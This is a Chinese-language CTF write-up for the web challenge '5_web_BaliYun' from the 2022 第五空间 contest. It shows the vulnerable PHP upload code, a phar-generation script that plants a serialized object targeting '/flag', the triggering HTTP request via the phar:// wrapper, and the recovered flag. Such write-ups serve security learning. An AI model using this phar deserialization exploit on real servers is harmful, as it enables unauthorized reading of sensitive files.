第五空间-2022-WP

CTF-WP ctf
Created At :
Views 👀 : Comment:
  1. web
    1. 5_web_BaliYun

web

5_web_BaliYun

访问www.zip 可以获取到源码,就两个文件,index.php和class.php

index.php

1
2
3
4
5
6
7
8
9
10
<?php
    include("class.php");
    if(isset($_GET['img_name'])){
    	$down = new check_img();
    	echo $down->img_check();
    }
    if(isset($_FILES["file"]["name"])){
    	$up = new upload();
    	echo $up->start();
    }

class.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
<?php
class upload{
    public $filename;
    public $ext;
    public $size;
    public $Valid_ext;

    public function __construct(){
        $this->filename = $_FILES["file"]["name"];
        $this->ext = end(explode(".", $_FILES["file"]["name"]));
        $this->size = $_FILES["file"]["size"] / 1024;
        $this->Valid_ext = array("gif", "jpeg", "jpg", "png");
    }

    public function start(){
        return $this->check();
    }

    private function check(){
        if(file_exists($this->filename)){
            return "Image already exsists";
        }elseif(!in_array($this->ext, $this->Valid_ext)){
            return "Only Image Can Be Uploaded";
        }else{
            return $this->move();
        }
    }

    private function move(){
        move_uploaded_file($_FILES["file"]["tmp_name"], "upload/".$this->filename);
        return "Upload succsess!";
    }

    public function __wakeup(){
        echo file_get_contents($this->filename);
    }
}


class check_img{
    public $img_name;
    public function __construct(){
        $this->img_name = $_GET['img_name'];
    }

    public function img_check(){
        if(file_exists($this->img_name)){
            return "Image exsists";
        }else{
            return "Image not exsists";
        }
    }
}

有上传文件功能和检查文件是否存在功能,可以注意到class.php文件中有两个类,其中的upload类有文件读取:

1
2
3
public function __wakeup(){
        echo file_get_contents($this->filename);
    }

__wakeup()是在反序列化过程中会自动调用的函数,也就是说只要我们能够触发反序列化就可以进行任意文件读取。同时check_img类有检查文件是否存在操作:

1
2
3
4
5
6
7
public function img_check(){
    if(file_exists($this->img_name)){
        return "Image exsists";
    }else{
        return "Image not exsists";
    }
}

文件上传+反序列化,这就联想到了phar反序列化。可以上传phar文件,利用文件检查操作和phar伪协议触发反序列化,导致任意文件读取,phar文件生成代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php

class upload{
    public $filename;
    public $ext;
    public $size;
    public $Valid_ext;

    public function __construct(){
        $this->filename = '/flag';
        $this->ext = '';
        $this->size = 1024;
        $this->Valid_ext = array("gif", "jpeg", "jpg", "png");
    }
}
@unlink("phar.phar");
$phar = new Phar("phar.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
$o = new upload();
$phar->setMetadata($o); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>

phar文件内容为:

1
2
<?php __HALT_COMPILER(); ?>
?              ?   O:6:"upload":4:{s:8:"filename";s:5:"/flag";s:3:"ext";s:0:"";s:4:"size";i:1024;s:9:"Valid_ext";a:4:{i:0;s:3:"gif";i:1;s:4:"jpeg";i:2;s:3:"jpg";i:3;s:3:"png";}}   test.txt   ?(c   ~囟      testy^紮!q@SaD2<5V苪   GBMB

上传文件后,发送如下报文触发:

1
2
3
4
5
6
7
8
9
GET /?img_name=phar://./upload/phar.jpg HTTP/1.1
Host: 39.107.76.202:24750
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

flag: flag{3QfNeV2JDk8wHKTgk5cHbynjC7HSXW5U}

转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 hututu1024@126.com

粤ICP备2023078889号-1 ©2021-2022 hututu

Built with Hexo and 3-hexo theme